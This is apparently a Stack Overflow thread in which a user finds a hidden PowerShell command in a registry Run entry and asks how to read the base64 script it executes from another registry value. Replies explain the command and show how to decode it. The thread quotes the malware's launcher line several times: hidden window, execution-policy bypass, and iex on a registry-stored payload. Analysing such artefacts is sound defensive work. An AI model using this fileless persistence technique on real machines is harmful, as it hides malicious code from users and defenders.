# How can i read the contents of a powershell script running in the background?

Tags: powershell, batch-file

I get this line by ***ProcessExplorer***

> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile
>   -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
>   'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

It looks suspicious or normal ?
Is that mean that the script is saved in registry and not in a file ? how to read then ?

**Edit :**
Now i'm sure that can be an encoded virus when i read this on the registry :

> Google Update    REG_SZ
>   "C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c
>       {BE9473EA-5660-4BF7-91C3-2A2258213EE1}    REG_SZ    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile
>   -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
>   'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

***Edit on 29/03/2016 @ 15:55***

If anybody want to continue this discussion i asked it here to decode this virus :

**[How can i read the source code of this encoded powershell script from the registry?](https://security.stackexchange.com/questions/118870/how-can-i-read-the-source-code-of-this-encoded-powershell-script-from-the-regist)**

Comment: The script just reads and converts (from base64) the value of HKCU:\Software\Classes\ZXWNMNLIMAGAL\LOOTDA. The script is not saved in a file nor in the registry, it just reads a key.

Comment: @jisaak Then what is `iex` is doing here?

Comment: I still begins in the powershell but my intuition tells me it is encoded virus!
So I think that we must read its contents from the registry and decode it. but this I have no idea for this kind of decoding is new to me

Comment: oh, I missed that part. So now this looks very suspicious  and im  interested of the LOOTDA content - can you post that @Hackoo?

Comment: @Hackoo Invoke the part, that follows `iex`, in PowerShell console: `([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)))`

Comment: Now, i export this data value LOOTDA from the registry with size of 1.5Mo, so where you advice me to continue to post it for helping me to decode it ? is there a specialist forum to continue with this ? because on stackoverflow is just for programming and not for decoding virus and helping people to get rid it !

Comment: You can use http://pastebin.com/ and provide us a link.

Comment: @jisaak i can't paste it on pastebin.com it's too long; so i join it in this [link](http://www.filedropper.com/lootdavirus)

Comment: Well, it seems like the script is obfuscated (variable names). Becasue of that, and because it is using commands like `Invoke-ReflectivePEInjection`  and invoke something on it, I doubt this is harmless!

Comment: [Information Security](https://security.stackexchange.com/) might be a better place for this question.

Comment: @AnsgarWiechers Thank you for your advice to the right direction !

Answer (score 1, accepted):

> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile
>   -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp
>   'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

This code means that PowerShell will execute with no window and bypassing ExecutionPolicy restrictions a command from registry key `HKCU:\Software\Classes\ZXWNMNLIMAGAL` (base64-encoded).

Looks like a virus to me.

You can identify the command if you execute this code in the PowerShell console:

```
([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)))
```

This will show you what is intended to execute.

Answer (score 0):

I got the same. i'm not sure, but it would be a hidden script runs in powershell. the script may be a phishing one. i think mine send emails to my outlook contacts.

Comment: Yes it did like that !